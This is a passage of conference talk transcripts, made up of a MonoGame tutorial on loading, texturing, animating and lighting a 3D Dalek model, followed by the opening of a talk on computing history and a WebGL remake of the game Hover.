shortcuts. It's certainly... it is usable, and there's lots of really nice videos, but it's quite a lot to keep in your head, and I sort of find... I use it maybe every three or four months, and I have to re-watch all the same tutorial videos again, because I've forgotten everything that I thought I knew. It's like, oh, yeah, I know how to... No, I don't. Right, where was that video that I remember watching? But it's a brilliant programme. And then the other option, which is... you might just be able to find some 3D models online. So there's a really nice website called BlenderSwap, where people sort of share the models they've made on Blender, and that's where I've actually got my model for today's talk from. So that's one of the nice sort of things. So... this, we go back to our game, and we're going to need to load a model. Now... back to Zoom. So Dalek.xnb is the model we're going to be loading. But this does sort of... I mean, I'm running on a Mac, which is brilliant, and you can sort of do all the stuff I can deploy to iPhone for that. But when it comes to producing content, you need something called the content pipeline. Now, for PNGs and a few other file types, you don't really need to run through this pipeline. What it does is it takes the content for your game, which is going to be sort of your images, your sounds, and your 3D models, and it sort of shrinks them down into this X&B format, which is an X&A format. And that is what is used by the game. Now, saying for PNGs, you can just use them straight, you don't have to do that. It's sort of good to, because it makes it more efficient, it sort of shrinks them down quite a lot. But you don't have to. But for 3D models you do, you need to have them in this X&B format. And Monarch is an open source project, and the content pipeline is a work in progress, and the bit they haven't finished yet is the making 3D models part. So what you actually have to do, which is a bit of a pain, is you have to create an X&A project with a content project in it, put your models into there, compile them, and then copy them across. It's not difficult, it's just faff. So I'm not going to deeply demo that. So what I've done is I've pre-compiled my lovely Dalek into an X&B format. But if you're making your own games, you have to go through that plava. They're slowly working on it, and it'll be there at some point, but it isn't just there at the moment. And so anyway, because I do, maybe you would be the same. A lot of my stuff is cross-platform. So I only really, I've been working on Windows as well anyway, so it doesn't really matter. So that's the file I'm going to load. And I'm going to, again, like with the texture plane, we're going to load a simple resource, a simple content resource, but then we're going to have an object that stores some extra properties for it as well. So in our load, let's do the Dalek texture equals content.load content.load model and Dalek. And we're going to bung him into this Dalek equals new Dalek model with I've called it Dalek texture. That's a very confusing variable. I apologise. There we go. So now, that's all you need to do to load him up. And then all we need to do to draw him is Dalek.draw and again, pass it to the camera just like before. And we can run that and we'll see the amazing Dalek that I've got, which I've been ruining it and very excited about. Except he doesn't look quite right. And that's because I'm trying to draw two-dimensional stuff and three-dimensional stuff into the same window. Now, there's nothing wrong with that. You can absolutely do that. But the sprite batch is a bit naughty. It sort of resets lots of properties of the way that it wants them. And it's not the way that 3D stuff wants them. So we're drawing our little dragon in the corner. Now, when we drew one simple shape, the plane, the 3D is not that hard, but as soon as we've drawn this Dalek, it's sort of culling the wrong faces, bits of the Dalek are going missing. So we need to sort of reset those properties. And it's not something I'd expect anyone to remember. So I've copied and I've just got it down here. So when the sprite batch ends, we need to reset the stuff for 3D drawing. And you can see it's setting sampler states, blend state and getPthensal state. And I don't really need to know what they are. It's just like a magic reset, and then we will be fine. I mean, the graphics device, I think for sort of optimization, has a lot of switches that sort of get set and you turn them on or off rather than being part of an actual object. So now we see our Dalek. See, much better than a dragon. Much better. So now will probably be a good time to explain how that model has been drawn to screen. It would be lovely if you could just sort of say drawDalek, but actually there's a bit of code behind the scenes. So we've got a class called DalekModel. And the important part is this draw method. And the important part of the draw method is this sort of loop here. So, I'm going to go ahead and draw it here. So, every time we come to draw it to screen, we are looping through various meshes. Now, some models will only have one mesh. Meshes, it sometimes makes sense to split your object up into several components. So a good example would be a car with wheels, because you want the wheels potentially to move separately to the rest of the car. If it was a person, there'd be lots of meshes for all the different parts of it that moved. If it was a box, there'd just be one. Meshes, which was the box. So you wouldn't have to bother looping through all of them. So, we're going to loop through each of these different subcomponents of the 3D model that we've loaded in, of which there could be any number. I think there are seven in this Dalek. And then each object in the Dalek potentially has a number of sort of effects on it. And each effect is just sort of... It's what sort of draws the surface and it might be quite often for a really simple one, again, there's just one effect. But if you want to sort of have reflections, you sort of have these slightly different versions of the same surface, which you have to place in the same point, otherwise you'll sort of get ghosting, where they're sort of in different points. The reflections of your Dalek will be over here, whereas the real Dalek will be over here. So we're looping through all those effects, and then we're just setting various properties on that effect. I'm cheating wonderfully. We aren't cheating, but just taking a shortcut with the lighting. I'm enabling default lighting. There's much sort of smarter things you can do to get really nice lighting effects, but enabled default lighting gets you sort of 80% of the way and 20% of the effort. Next, I'm setting the world matrix on that effect, and that's what places it in the 3D world. Again, if I sort of fiddled with that, we'll come back to this part in a second, but effectively, I'm just placing it in the world. Then I'm calling the camera and displaying it, and we'll come to the camera in a second. This part is just because the 3D file might contain some extra little weird transforms. If you don't do that, it doesn't draw quite to the place you expected it to. It's just like a little extra step you have to do. You have to copy the transforms out of the actual model in this little array, and then apply them by multiplying them with where you think the actual object should be. I think particularly when you've got multiple meshes, I think what that is, is just so they don't all get drawn in exactly the same spot, so the different segments of the Dalek will get placed above each other. That's sort of the drawing part. Then what we come to do here is camera doc display, and we display it with the camera. The camera is actually really simple. Display, all it does is set the view and the projection matrix on this object, on that effect. To explain what those are, that's all the camera class is really responsible for doing. It's responsible for keeping track of these two matrices, which take something, a 3D model, lots of little points, and work out where to plot them on a 2D plane so we can see it on our screen. The view is where you're holding the camera. You can see in the constructor here, we gave the constructor the position, the target, the up, and the game window. We store them so we can use them later. Then we just create a look at matrix, which is our view matrix, using those things. You can think of the view matrix as where the camera person is holding the camera and he's pointing it out. Whereas the projection matrix is the sort of camera that he's holding. You could set up a widescreen camera, you could set up an orthographic one where you lose all the 3D effects and everyone's sort of just quite 2D and blocky. In set projection matrix, that's where we create it. All is really interested in is a screen. We use create perspective field of view, which is another lovely helper method on matrix, the create this matrix. The last two properties are the near field and the far field. It's just for optimisation to sort of say, if anything's closer than one unit, don't draw it. If anything's further away than the far plane distance, which in the case of this example is a thousand, don't draw that either. You could set that to be infinite, but the smaller you can set that, the more you can perform well. But actually, you might start missing bits, you'll find things just disappear into nothing because they've fallen off the far plane distance. The screen aspect is just whether it's widescreen or not, and it's width divided by height. The first one is, what's it called? It's sort of the viewing angle. We could make that smaller. Everything's measured in radians, so there are pi radians in 90 degrees. I'll get confused now. Help, how many pi radians in a... 180. So pi radians in 180. This one's got a 90-degree field of view. So we could make that be a 45-degree field of view by doing over four and just see how that affects. Basically, our camera has now thrown that camera away and picked up a new type of camera to see the scene. You can see that we're much closer because we can't see as much stuff out. So that's what the camera does. You set it up once, you have these matrices that control the view, and it will turn all your 3D objects into 2D flatness. You could also have animated cameras. A lot of games have a camera that follows the stuff round, so you might have an update method on your camera which keeps track of its position and moves the camera around. There's lots of different forms of that. You might have one. Actually, my game Tower Block has a camera that rotates round. So the position it's looking at, the target always stays the same. But the position just moves around in a circle around it and animates in the update method. So that's our camera. OK, so... We've got a Dalig, that's lovely. He's looking a bit flat, though. Maybe he needs some textures added to him. Now, you can... include textures in the actual model file themselves, or you can load them prog-matically, and you might even want to change them during your game if someone changes their outfit or something. So if we go back to our Dalig model, all we want to do is effect. TextureEnabled equals true. Next, he's going to ask us to set an actual texture, but we haven't got one. So let's add one into the constructor. Texture2D... Texture. We'll just store that. I should probably say I've been using Xamarin Studio for this, and it's an absolutely brilliant idea, actually. But then occasionally you just miss a few things. In Visual Studio, you're like going, no, I can't do that. But it's fully featured, and very nice indeed. So, yeah, we're storing that. And then... TextureEnabled... true. Effect. Texture equals... There it is. So now we're going to have to load up a texture. Actually, we don't need to sort of store it globally. We can just pass it into our object. So here we go. We're loading the Dalig model, and the next we will load a Dalig texture. And... I think I've called it Dalig Metal. OK, so we've loaded the texture. We've applied it to each effect in our model. And now when we run it, we should get a slightly... Oh, no! OK, now I can see what I've done. I've forgotten to tell it what sort of thing it's loading. Can't sort of just guess. You need to tell it. There we go. No, I'm doing something very wrong. Or do I need to do so? Yeah. Thank you, Roon. I didn't mean it when I said you talk with rubbish. There we go. And now we will have a Dalig with a texture on. Now, it's a bit far away. You have to move a little bit closer. So if we go back to where we set up our camera, and we had it sort of 15 away, let's just change that to being 10 away instead. And come in. And appreciate our Dalig in all his glory. It's not the best texture, by the way. Just sort of grabbed it randomly. But you sort of get the idea. So you could find much nicer ones than that. I suppose to be one of those sort of metal floorways you get with little slats that sort of go backwards and forwards. OK, so we have a Dalig. He looks beautiful. But he's not very threatening because he's staying still. So we're going to have to animate our Dalig next. And getting sort of moving around the screen. OK, we're doing good for time. So this is where the update method comes into play. And we will call Dalig.update. And we pass it the game time. And the game time allows us to keep the speed constant regardless of the frame rate. So the frame rate might be changing. It might be 60 frames a second. It might be two frames a second. Hopefully not two frames a second. But it will always, it won't sort of move in different amounts based on that. So we go back into our Dalig model and open up the update method. Now I've sort of prewritten this. Again, we've come back to using a matrix. And this is where we're going to use a create rotation y matrix. And what that does is it takes your object and rotates it round one of the axes. So if your object is standing at 0, 0, 0, right in the middle and you just rotate it around the y, it will just rotate like that. If we were to step a little bit away from the axis, you'd sort of rotate round like that and move round it. And the model angle delta is the amount that it's changed. So the next part is we multiply in the existing world by this translation. And that shows one of the nice properties of a matrix is it sort of, it stores all the previous things that happened before it. If you keep on multiplying it by an extra little bit, it will store the new place it's moved to. And you won't have to sort of work out a new thing from scratch each time. So I'm not storing the model angle in this case. I'm just storing the matrix that will take our object from being at 0, 0, 0 and rotate to get round the correct amount. So now we've got that, our Dalek will start to become a little bit spinny. Now we have a spinning Dalek, which I was personally very pleased with. And I've sort of made sure that in the model file, the y axis is sort of going down the centre of the Dalek's head. So he sort of spins around that part of his body. Now it might be that we don't just want him to spin. We want him to sort of maybe move around in a bit of a circle. We want to combine two matrices together to move him out from the middle and then rotate him round. Now to do this, we can no longer rely on this little shortcut of not storing the angle. Because when you combine two together, if you need to take our Dalek, translate him out to perform part of the ring, and then move him round like that. If you want to keep this nice circular shape by translating it round and then spinning him round the middle, so easy to show. So there's two transforms you want to do. You want to move away from the central spot and then you want to rotate him round that spot like that, so he does both in once. If you repeatedly apply that translation matrix and just store it once, he'll sort of go all over the place. So what we want to do now is actually introduce a new variable called angle. That's going to, rather than doing what we're doing here, we do underscore angle plus equals the delta. Now we are keeping track of that. Rather than world equaling itself times that, we don't do that part and we just use the full angle there. For now, it's two ways of achieving exactly the same thing. That will look no different on screen, but you get some extra flexibility, which is we're now able to do two together, which is translate him out and then move him round. So he'll go round in a circle. So we'll need a... Sorry, I wrote what order to do this in translation. So we times that by a create translation. This is looking for the x, y and z that we want to translate it by in the form of another vector. So we just want to move him along the not up, that would be y. We want to move him sort of forwards. So that's the z. So zero comma zero comma... I don't know how much by now. Two should be a nice sensible number, hopefully. And then if we look at that... Oh, yeah, I shouldn't have made that read only, if I wanted something to keep track of stuff. Okay, so he's not doing what I wanted him to. I wanted him to move round in a circle, but he's actually still just spinning. And what you probably can't tell is he's moved two to the side and then he's spinning on that two spot. Whereas what I wanted him to do was sort of spin a bit and then move out. So I've got the order of those translations the wrong way round. So the order you do, the matters. I typically find I end up doing it by trial and error, but you can work it out in your head. So what I need to do is swap these round. Okay. And maybe you could increase the amount he's moving round by to four. So now we have a patrolling Dalek, much more threatening, much more scary, and again, piss is on the non-moving dragon. Although if the dragon had bubbles, then it'd be more evenly matched. So this is probably a good time to tell my deep, dark, dirty secret about this demo. In that I sort of, I got this model, I was really pleased with it, I was really excited. I was boasting to everyone, mostly Rune, about how beautiful my Dalek was. I've been drawing him to screen, and I've been doing it sort of on my Windows machine to get my demo working. I was like, well, I really want to do it on a Mac to sort of show that you can do it to the iPhone thing. And the Dalek was juttering. He was hardly moving at all. He measured the frame rate, and the frame rate was two frames per second. I was thinking that that's not acceptable gaming performance. The reason is, this model was made by a guy, oh shatty, I should say who the guy was. It's Creative Commons, so I have to say his name, one second. It was by Benji10, and you can find his stuff at blendswap.com, forward slash user, forward slash Benji10, forward slash blends. He loves Daleks, he's done a lot of Daleks, all the way from the 60s to modern-day Daleks. If you love Daleks too, that is a place to get your 3D models of Daleks. But he loves Daleks, and they're incredibly detailed, these models. Down to nuts and bolts, little sort of high polygon nuts and bolts. And in a game, you really need to keep the polygon count down. And this is where I had to sort of go and re-remember how to use Blender to get rid of the majority of the beautifulness of this model. But I've still not managed to get it to sort of a gaming standard model, and that's my dirty secret. The frame rate of this game, when I last measured it, was five frames per second. Which I can just about get away with. But it sort of shows you that actually performance does matter. On a PC, it runs fine. I mean, the people are using Mono Game and the 3D stuff to make, like, Xbox games and PlayStation 4 games. I suspect they're using lower polygon counts than I am as well. But when it comes to doing it on a mobile device, it actually really does count. There are lots of tricks in 3D you can use to simplify things. You actually have a very simple shape, and you put a beautiful texture on it, which has most of the detail on it. There's no need to have sort of an actual 3D model of a nut on your Dalek when you can just draw a little picture of it and paste that onto the side of it. And I could do an awful lot to get my... I'm not looking at the Dalek, am I? Dalek, where's Dalek on? There he is. There's an awful lot you could do to really simplify this model. I mean, I spent quite a long time with Blender simplifying him down, and I've got the frame rate up to five, but there are still hundreds of polygons in this model, and it just doesn't need to be. One of the other tricks that's commonly used in gaming to simplify the number of polygons is to... If you had a whole army of Daleks coming to attack you, only the first few would be real 3D models. After a few levels back, there would just be pictures of Daleks on 2D planes, like we saw in the first example, and those would be all the background ones. So you might see these sort of beautiful games that must have like these immense polygon counts, but they're doing all these tricks. The trees in the background, they're not drawing every single leaf individually, it's a 3D model sort of rustling in the wind. They've just got a picture of a tree back there. So that's my dirty secret. This would not make a well-performing game. But I think I'm probably going to go home and... I want this Dalek to be beautiful, so I'm going to go and sort him out at some point. So we've done that. So there's one last thing we call... Two last things we can do depending on time. We'll try and fit both in. So the first thing is, what we've said before, he's got all these different meshes to him. All the different parts of the Dalek are actually separate objects in their own right. And if you want the Dalek to be shooting people, like the central bit's going to move, his head's going to move separately, so you can move those independently. So what I'm going to do is set up an array of matrices to control the transforms of all the different meshes there inside him. So matrix array... We'll just call it underscore angles. Actually, we call it mesh angles. And just do for... Is less than... I should have had a copy and paste bit for this, I apologise. So first of all, we need to just sort of set them all up with the identity matrix. Oh, yeah, that is not a semicolon. It's close. Mesh angles... I......calls... Oh, did I actually say what the identity matrix is? So the identity matrix is the equivalent of zero or one. It does nothing. So if you transform something by the identity matrix, you know, multiply a matrix by the identity matrix, it's the same as times you get by one. Nothing will happen to it. It will stay exactly the same. So it's a really nice sort of initial number to set something up with. So that's all we're doing there is we're setting up an array of identity matrices, identity matrices that will make no difference whatsoever. And then in our update method, we're going to fiddle with them a little bit. We're going to multiply them all by a rotation matrix around......not comma, dot. There we go. Create rotation y again. And we'll take the same delta angle that we're spinning the model by, but we'll minus it so we'll have it swimming spinning the other way. Model angle delta. And just so they're moving independently, we'll times that by i. So each part of the Dalek will be spinning at a different rate. And then... I'll order to do this in. When we come here and apply it to the world, we'll also transform each individual mesh by this one inside this array. So mesh, angles, i, star. There we go. That's maybe in the wrong order. If it's in the wrong order, these transforms will know pretty quickly. You still have to create the array. It's going to blow up. You're right. I have to create the array or it's going to blow up. Wait for the blow-up. Blow-up! Excellent. So that's in the end here. So......shangles equals new matrix. OK. So, hopefully the same as before, but without the lovely blow-up stage. And I've done them in the wrong order. So you see the danger of doing things with... So what you need to do is go back to this line here, and that's obviously in the wrong place. Let's try there. And hope for better this time. OK. So we now have a very dizzy darling. You may notice that things aren't actually like... There will be better ways of doing this. Actually, maybe working out where his arm bits are separate, so they're just spinning round of their own accord. They should probably stay locked. So if you had a model like this, rather than just referring to them as different arrays, like this is index one, this is index two, you'd want to say skirt, head. I don't know what the front gun, I don't know what the bits of the dial are called, rather than this, so you could sort of save this terrible, terrible effect. So there's our dizzy darling. So... We've got quite far using very simple code, and I think it looks quite beautiful, even though he's not performing exactly as he should. But it's not quite that the textures aren't as beautiful as they are in really professional games. They're kind of quite rough. And that's where shaders come in. So that's sort of my next on my list of things to learn. Basic effect, which is what we're using to draw all the different parts, is something built into monogame and just gives you this really nice, out-of-the-box simple way of doing things. But you can replace that with your own implementation and really fiddle with that, and that gives you a lot more flexibility to sort of have reflections to say what is reflecting on what, and some really nice examples. I'm going to be working through that, so I will be posting blog posts as I learn that. So if it is something you're interested in, then you might want to follow me. So as I learn, hopefully I can share that. But you can do a little bit more with lighting, so you do get some directional lights inside this effect. So whilst you're looping through drawing something, you can fiddle with the lighting a little bit and get some extra sort of things. So if you look inside effect, there are some directional lights. There's three of them sort of built in, and you can place those. And it's quite clever how it works out where a light hits something. It doesn't do ray tracing and work out like, you know, I've got this object here and that object there, therefore the light won't possibly be able to see it. It looks at each object in its own right, and it just looks at the surfaces and says, is that surface pointing towards the light source? Yes or no. And that's how it works out, whether to, you know, what whether to and how much light to apply to a rendered texture. So let's just set up a quick directional light. So we can set its colour, and there's lots of differences, the diffuse colour and the specular colour. So the diffuse colour is sort of the main colour of our light. And we'll do, I forgot how you get to colour. There we go, colour.red. So this is a sort of a colour object, but unfortunately directional light is expecting another vector. But luckily we can convert them straight into a vector like that. And now we have a diffuse colour. We can also set its direction. And the direction again is going to be a vector. I worked out last night the best place to have a light, and I've forgotten what it was. So this may look terrible. Three, I think, x, y, z, x. Keep that one zero, minus four. Try that. And let's see what our Dalek now looks like. Lighting, I think, is really one of those things that you probably don't want to keep on going into the code, changing your values. I'll bet it far too red. It's one of those things where you fiddle with the numbers and you get the effect you want, and there's lots of different subtleties to it. And you probably don't want to be going, like I'm going to do now, and you're like, oh, that's not the colour I wanted. Stop, come back in, let's try a lower number on that, see if it gets a bit darker. You probably want to have a little edit thing that allows you to fiddle with those numbers quickly and change the direction and try different things. So the direction, I mean, we only discovered this whilst fiddling around last night, doesn't only control the direction of the light source, it also seems to control the intensity of the light source as well. And you can set up multiple ones of the directions they're in. So, again, we now have a spinning directional light, spinning Dalek with a directional light on him. But if you wanted to have a really beautiful, shiny Dalek, maybe walking on a ripply watery surface, that's where you'd have to get into shaders, and that is maybe where game development gets a little bit trickier, but still, I think there's just so much stuff you can do, and I really sort of urge you to have a go. It's lots of fun, and it's just a really nice thing. So just closing slide. No, not that. Done the one. Thanks for listening. If that says something rude in Norwegian, it's runes fault. I'm assuming it says thanks for your attention or something. So you can find out more about monogame and have it to have a play and download all the stuff you need from monogame.net. There's links to the slides on my blog, which is at noginbox.co.uk. If you want to download an amazing game, then you have to go to towerblocks.net immediately, tell all your friends, spread to your... and then just give me amazing reviews. It'd be nice to have reviews from people other than my dad. So thank you very much.
|
MonoGame is a brilliant games framework that solves the annoying problem of more platforms to develop for than you can throw a hat at. With monogame you can develop for them all at once. MonoGame is an open source implementation of XNA. It makes 2D game programming very easy, but a less well know fact, is that 3D is also much easier than it seems. This talk will guide you through the basics of 3D game programming, You'll be loading, displaying and moving 3D models with textures and be able to play about with different camera types. By the end and once you've clocked out from the day job you'll be ready to create your own 3D gaming masterpiece.
|
10.5446/50858 (DOI)
|
Alright, hey guys. Thanks. It's the last day of the conference, kind of an early session, so thanks for making our talk a priority. It's really nice to have you guys here. So this talk is called The Future of Extreme Web Browsing, and I'm Robbie Ingebrezen, and this is my good friend and colleague Joel Fillmore. And you might be wondering what extreme web browsing is, and the answer is that it's something we made up. I actually know what it is. It seems like a really great name for a talk, and it got you all here, so it worked. So Joel and I together make up the entirety of a company called Pixel Lab, and we are relatively small, as you can see, we're two people. But we've actually done some pretty exciting stuff over the last couple of years. We've worked for some relatively big clients and created some experiences that we're actually really proud of. We're mostly an HTML5 shop, so we primarily work creating sort of futuristic experiences on the web. Like our kind of area of expertise is games and multimedia, sort of things that kind of sit on the edge of what you can do inside of a browser. So the sort of this era of innovation in HTML5 has been a really exciting one for us because we've had a chance to do some really exciting things. And in doing that, it's given us some perspective, both on where we've come from as an industry in terms of the types of experiences that you can create, as well as where we're going. And that's kind of what we wanted to talk about today is sort of that transition. And like I mentioned, the focus of what we want to talk about today is this idea of experiences. And when we were thinking about that word or when we think about it, we think it's kind of a funny word because everybody comes to us saying like we want to build this type of an experience. We're interested in user experience. We want a marketing experience. It's almost like when it comes to the web, especially, that's sort of the word that people use instead of an app, right? Not to say that people don't create web apps, but normally people create web experiences. And we think that's kind of a funny word and kind of a new idea that you would create an experience because for a long time, digital things that happened were not really experiences. My dad was a computer developer in the 70s and I don't think my dad was ever thinking about his experiences that he was creating. He was thinking about what the software could do or algorithms or things like that. And now, experiences are something that, sorry, digital experiences are something that we all have. Everybody from my kids to my mom to my grandma is having digital experiences. So kind of with that in mind, we wanted to step back for just a minute and recognize that we're sort of part of a trend and that kind of see where we've come and use that as a way to give us a reference for maybe where we are going in terms of the types of experiences that we can have with digital things. Yes, I think to talk about the future of web browsing, we wanted to look back in history and see if there were any parallels as to how the early pioneers of computing used the technology that was sort of cutting edge at that time to mimic real world experiences. A couple of years ago, I visited a museum for the first time I was working with a client in the Bay Area and there's a museum called the Computer History Museum. It's a pretty amazing museum and it was really close to where I was working at the time so I went and the museum is organized as a tour through history. So you start out at the beginning of the museum and you see some of the first computational machines where they would do a simple arithmetic adding and then you work through more complicated computers and you finally get to the end and you've sort of taken this tour of computation and computers over history. I thought I'd share a couple of sort of my favorite exhibits. The first one, when you walk into the museum, there's the Babbage Difference Engine. So Charles Babbage conceived this machine that would calculate logarithmic tables which were pretty tedious to compute and error prone. So he thought there must be a better way I can create this machine to do it. He tried to raise funding from the UK government and I believe he raised some money but was never able to fully build the machine. So in the 1990s, a group of scientists who were at the university or the museum of London decided that they were going to finish this thing and they raised some money and actually built it and proved that it could work. They also ran out of funding like Charles Babbage so they weren't able to complete the machine that does the output where they would print out the results of it. And so after a number of years, they found a guy whose name is Nathan Mervold who was the former CTO of Microsoft and he said, I will fund the construction of the adding machine on the condition that you build me a replica. So they said, okay, we will do it. So they built the print out so they could get the results from the machine and they built Nathan a second copy. And Nathan is a pretty interesting guy. He's controversial as well for a number of reasons. He's involved in a lot of different things. He is sort of an amateur paleontologist. His home is on Lake Washington and has a giant T-Rex skeleton that he discovered during one of his digs. So that you can imagine he's pretty eccentric. However, his wife really didn't want this in their living room. He had sort of planned like, I'm going to put this in my living room. But as you'll see, I'll show you the video of how this thing works. It has a lot of moving parts so that it can basically manually do the addition of these tables. And so it requires oil to lubricate all the gears. So his wife was concerned about the smell of oil in their living room. This is a quick video, you can see kind of how the machine works. So there's a guy that's actually cranking the gears and it'll add up all the numbers. It's really quite beautiful to watch it in action. It's sort of moving on in the museum, going from the initial adding machines where people would do tedious math. We come to the first example of programs that were written. This is a pretty interesting exhibit. It's a guidance computer from the Apollo moon missions. And this is pretty crazy because they had to weave these by hand and this is read-only memory. So the way it would work is that they would create a program and then they would have people that would actually weave it through. So if they made any mistakes, that was a multiple-day process in order to fix the code. So we should be very grateful for the speed of our modern compilers. It's pretty crazy to think what they had to endure. Further on, they go through the history of the rise of Silicon Valley and VCs. And this is from a bar called the wagon wheel, which is a pretty popular bar in Silicon Valley. And so it's a business plan on a napkin. So you draw your specs on the first side. You fill in the business plan on side two, start the company in your garage, and the final step is throw huge rock parties. So I really don't know what's changed. Like it still feels like it's a little bit the same, kind of crazy. So that was kind of a fun piece of history. As I got towards the end of the museum, we started getting into the first visual computers where they had output. So this is the Alto made by Xerox at their famous park laboratory. And this is a really interesting computer because it had a lot of the elements that we today consider part of just sort of the standard of computer. It had a mouse, so it had the user input. It had a visual screen. It had GUIs. It had Windows. You can see that the screen itself has got the page orientation. And part of that's because it was Xerox. Like they were a document company. They made documents. And so I think that's an early example of how people looked at new technology and tried to adapt it into real world experience. So they said, we have documents. If people are going to use computers, they would clearly use them in the page format that they're used to, just like a Xerox machine would. Kind of next to the Xerox machine, there was just a little teapot. And this is a kind of, they had a pretty interesting story behind this teapot. It's called the Utah teapot. And this is famous because it's one of the first examples of 3D. So at the University of Utah, there were a group of computer scientists who were early pioneers in the use of 3D. And one of the professors, Martin Newell, wanted to find some object where he could model something physical in three dimensions on the computer. And so his wife suggested that they use this teapot that she had purchased at a drug store. And so this has become sort of the hello world of graphics packages. Like oftentimes you'll have libraries that will draw teapots. And it's sort of the first thing that every 3D library shows you how to do is the teapot. So after I went through this kind of really fun trip for me, touring the museum, I came back and I was telling Robbie about all the fun things that they had. And I mentioned that they had this teapot, which was actually one of the first 3D models that they had done. And Robbie said, well, that's funny because my dad was actually at the University of Utah. I was like, what? So we actually had a teapot in our house growing up just like this, because I grew up in Utah. And my dad was a master's student at the University of Utah at around the same time. And in fact, so he was working on sort of the idea of taking digital recordings, well, of creating digital recordings, actually. It's funny. There were no digital recordings prior to that. So he and a man named Tom Stockholm were involved in really, really early digital audio. So that was my dad's master's thesis. His office mate was a guy named Ed Cantmel. And Ed had a direct connection with the Utah teapot because he was involved in the graphics department at the University of Utah. Is anybody here heard of Ed Cantmel? If you've done a lot of 3D graphics, you have heard of him because he has many of the sort of fundamental algorithms that kind of we use in 3D rendering today are named after him or their math that he did. He's a really pioneering figure in 3D and mostly known though because he started a company called Pixar. Is anybody here heard of Pixar? So when my dad was, when I was young, so my dad, I guess, finished his master's when I was really young. I was probably two or three years old. After that, he started, my dad started a company called Soundstream. They were doing digital recording. Ed started, went and worked with George Lucas, did a whole bunch of other things. When I was like 10 years old, my family considered moving to California because Ed had a new startup called Pixar and he wanted my dad to join and my dad just didn't think it was going to take off. So we decided to not do it. I think he made the right decision. But Pixar was pretty successful in spite of my dad's prediction. A couple of years ago, Ed was doing a tour. He was speaking and one of the schools he spoke at was the University of Utah. So he had come back to the University of Utah and my uncle is a professor at the University of Utah. So they ran into each other. My dad passed away a few years ago. So they were, my dad, sorry, my uncle and Ed ran into each other. They were talking about my dad and Ed said, well, you know what, if you want, you should come out and I'll give you a tour of Pixar. And my uncle said, OK, yeah, that sounds great. Let's do it. So I somehow talked myself into that trip also. So my uncle, my wife, myself and a couple of other friends went out to Pixar. And I kind of expected that we'd show up there and Ed Campbell would shake our hands and say, thanks for coming and then kind of send us on our way with an intern. But instead, actually, we spent an hour and a half walking around Pixar with Ed Campbell. So that'd be like touring Apple with Steve Jobs. Like it literally was his, you know, he's the CEO. He's the founder. And it was amazing. My wife cried because it was so emotional to see this man's vision become a reality. It was really, really amazing. But one of the things that happened while we were there is I mentioned that in my dad's belongings, we had this little eight millimeter like role of Super 8 film that was Mark Hand video. And Ed immediately knew what it was. It's a video that he and my dad and a man named Fred Park had worked on. And it was the first, I believe, I literally believe it is the first 3D digital video ever created. And Ed thinks, thought so too. So I told him about it and I said, you know, we really should like figure out a way for people to see this because it's 3D video like Pixar would create, but it was created in 1972. And he said, well, if you want, you can digitize that and you can put it on the internet. So I did it. And this is a little bit of that video. And so my dad did the credits. So that's my dad's software right there. Oh, did it pause? Oh, no. Try it again. There we go. Okay. So the thing that's really remarkable to see about this is not just that this is 40 year old 3D video, but inside of this you can kind of see some of the way that it was produced. By the way, when I put this on the internet, everybody thought it was fake. The main thing I had to do was convince people that it was real. So this is the video. It took two and a half hours to render each frame on a machine that in 1972 cost $400,000. So that was $400,000 in 1972. And they could render one frame in two and a half minutes. So it's crazy to think about what we can do. Now we render 60 frames per second on hardware that costs $30. So then here you can see they were coming up with the math and sort of the basic concepts for how it is that you create 3D. So that's literally a plaster cast of Ed Campbell's hand. And they went through and they drew all of the polygons on it and did the measurements for the vertices. So that's what you're looking at there. Then they digitized it to create all of the math. And then they would enter those manually into the rendering engine which they had created. So what you're watching here is 3D computing literally being invented. And I kind of think it's amazing to see it. So this little bit of hand video actually went on to be in a feature film. There was a, I can't remember the name of the movie, but there was like a two or three second clip in a movie in like 1977. Stay to the art special effects. So there it is. That's them moving the vertices. And this was the part that my dad told me Ed was most proud of was the fact that they could like manipulate the hand and make, you know, animate it, make it do something. So then that algorithm for the smooth shading is something that Ed became famous for. And also for founding Pixar. Those are the two things. Okay. We can probably move on then. Okay. So we kind of talked a little bit about the early years and how the first pioneers of technology looked for ways to mimic reality in these sort of emerging technologies. So we thought we'd do the middle years and we'd talk about Windows 95. So who remembers Windows 95? Lines out the door. This was a really big deal at the time. I remember it as sort of the difference between Windows 3.1 and Windows 95. It was exciting times back then. So Windows 95 came with a few extras. It was printed on CD-ROM. There was no digital distribution back then. And there were a few extras on the CD-ROM. One of those was a music video by the band Weezer. Who remembers Weezer? All right. We got some Weezer fans in here. And they had Buddy Holly on there. So I think that music video has probably been seen more times than, well, at least back then it was probably a new record. That was when we had YouTube on CD-ROM. Yeah. Right? Yeah. The other extra that was on the Windows 95 CD was a game called Hover. And Hover was a capture-the-flag game where you would manipulate a hovercraft through a maze and you would race against the computer to see who could capture the flags first. So the intention with Hover was that it was meant to showcase sort of the 3D capabilities of Windows. And actually, let's see. So this is a screenshot of the original version of Hover. And crazy enough, this actually still runs on modern versions of Windows. So you can download the XE and actually run it, which is just incredible, the commitment to Batcompat that they have after so long that it still runs. So in IE 11, Microsoft started supporting WebGL and they were approached by an enthusiastic developer named Dan Church. And Dan had grown up playing Hover. He was sort of born in that time, loved the game, and was so enthusiastic that in his spare time he had reverse engineered the game and done a lot of the work to get it running in WebGL. And Microsoft was really excited about this project and asked us to help make the Hover WebGL version a reality. So it was a really fun project that we worked on. And this is sort of an intro video. That's hilarious. Every time I watch it, I laugh. I think I'm getting my mouth too close. Doesn't care that your boss isn't happy with your neck beard. Doesn't care that your dinner's getting cold. And Destiny definitely doesn't care about the past. If it's victory you want, you're going to have to put in the time and the work. Because Destiny only rewards those who are thirsty. Those who know that as delicious as lasagna might sound right now, it'll always come second to the sweet taste of victory. As far as Destiny's concerned, you have just one job. Because Hover is back. With brand new 3D graphics, touch gameplay, and multiplayer mode for head to head competition. It's time to take back the crown. It's time to go to work. We were pretty excited about that video because Dan Church, the guy that did the port to WebGL, had told us that he was actually the Hover champion at his school. And so I think I hope he was excited about the video and didn't think we were poking fun of him. We're still trying to get some of those trophies because apparently they actually made some of those posters and trophies. They actually shipped one of them to Dan. So he's got his Hover trophy now. He's deserving of it. So Hover was an example of the parallel between the rise of computing technology early on. We saw the same thing happen with Windows 95 where people looked for ways to push the state of the art. So I think in today's world we see the same explosion in the web. We started off early where there were pretty limited capabilities in webpages. We basically had a markup and you could display documents. And then we got JavaScript. You could add a little bit of interactivity to the page. And then came Canvas. We had accelerated 2D 